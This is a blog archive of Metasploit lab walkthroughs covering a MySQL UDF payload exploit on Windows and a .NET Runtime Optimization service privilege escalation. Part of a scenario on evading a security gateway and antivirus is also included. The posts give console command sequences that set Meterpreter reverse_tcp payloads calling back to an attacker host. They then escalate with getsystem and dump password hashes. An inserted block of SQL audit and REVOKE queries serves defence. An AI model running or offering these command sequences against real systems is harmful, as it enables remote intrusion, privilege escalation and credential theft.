Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seems to have existed since 2007!
Vulnerability discovered and disclosed by Bernardo Damele on 2009-01-16
Metasploit PoC provided by todb on 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All MySQL releases for Microsoft Windows that support UDFs, because the default MySQL installation runs the service with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … INTO DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions are not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine the sys_eval() and sys_exec() functions.

To exploit this weakness, the targeted MySQL user must hold the following global privileges (FILE is what makes SELECT … INTO DUMPFILE possible; CREATE ROUTINE, ALTER ROUTINE and EXECUTE are needed to register and call the UDF):

grant select,insert,file,create routine,alter routine,execute on *.* to test3@'%' identified by 'test3';
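The privilege set above is also what a DBA should look for when auditing a Windows MySQL server. The following SQL is an added defensive audit, not part of the original post or of the Metasploit module: it lists accounts holding the FILE and routine privileges the module depends on, shows the server settings that bound where DUMPFILE can write and where UDF libraries are loaded from, enumerates registered UDFs (the module defines sys_eval and sys_exec), and revokes the excess privileges from the test3 account used in the post. The account name and the secure_file_priv path in the trailing comment are assumptions.

```sql
-- Added audit queries (not from the original post or the Metasploit module).
-- Run as a MySQL administrator on a MySQL 5.x server.

-- 1. Accounts that hold, globally, the full privilege set the module needs:
--    FILE for SELECT ... INTO DUMPFILE, CREATE ROUTINE / ALTER ROUTINE / EXECUTE
--    for CREATE FUNCTION ... SONAME and for calling the resulting UDF.
SELECT User, Host
FROM mysql.user
WHERE File_priv = 'Y'
  AND Create_routine_priv = 'Y'
  AND Alter_routine_priv = 'Y'
  AND Execute_priv = 'Y';

-- 2. Any account with FILE at all deserves review: FILE alone lets a client write
--    arbitrary bytes to any path the service account (LocalSystem by default) can write.
SELECT User, Host
FROM mysql.user
WHERE File_priv = 'Y';

-- 3. Server settings that limit the attack surface. An empty secure_file_priv means
--    DUMPFILE may write anywhere; plugin_dir is where UDF libraries are loaded from,
--    so its filesystem ACL should not allow the service account to write into it.
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'plugin_dir';

-- 4. UDFs currently registered on the server. Entries the DBA did not install,
--    in particular sys_eval / sys_exec, indicate a planted library.
SELECT name, ret, dl, type
FROM mysql.func;

-- 5. Remediation for the test account from the post (account name assumed from the
--    GRANT statement above): drop FILE and the routine privileges it does not need.
REVOKE FILE, CREATE ROUTINE, ALTER ROUTINE, EXECUTE ON *.* FROM 'test3'@'%';

-- secure_file_priv is not a dynamic variable; set it in my.ini and restart the
-- service. Assumed path, adjust to the deployment:
--   [mysqld]
--   secure_file_priv = "C:/ProgramData/MySQL/uploads"
```

Queries 1, 2 and 4 should return no rows on a hardened server. The SQL side only limits what a MySQL account can do; the other half of the fix is on Windows: run the MySQL service under a dedicated low-privilege account instead of LocalSystem and restrict write access to the MySQL data and plugin directories.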

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump

EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation

Timeline :

Vulnerability disclosed by XenoMuta on Exploit-DB on 2011-03-08
Metasploit PoC provided by David Rude on 2011-03-08

PoC provided by :

XenoMuta
David Rude

Reference(s) :

EDB-ID-16940
OSVDB-71013

Affected version(s) :

Microsoft .NET Framework 4.0 and 2.0

Tested on Windows XP SP3 with :

Microsoft .NET Framework v2.0.50727 (mscorsvw.exe)

Description :

This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. It seems to work on Windows XP SP3, 2003 R2 and 7.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background

use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit

sessions -i 2
getuid
hashdump

Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus

Third scenario of the Metasploit Exploitation Scenarios.

Here, the user is a standard user, protected by 5 countermeasures:

– Firewall rules that limit outbound connections to specific ports only.
– Transparent HTTP/S proxy for web surfing.
– Dual antivirus (Avira / ClamAV) scanning for web surfing (useless in this case, due to the Astaro bugs).
– Dr.Web Antivirus on the target Windows XP.
– Windows Firewall on the target Windows XP.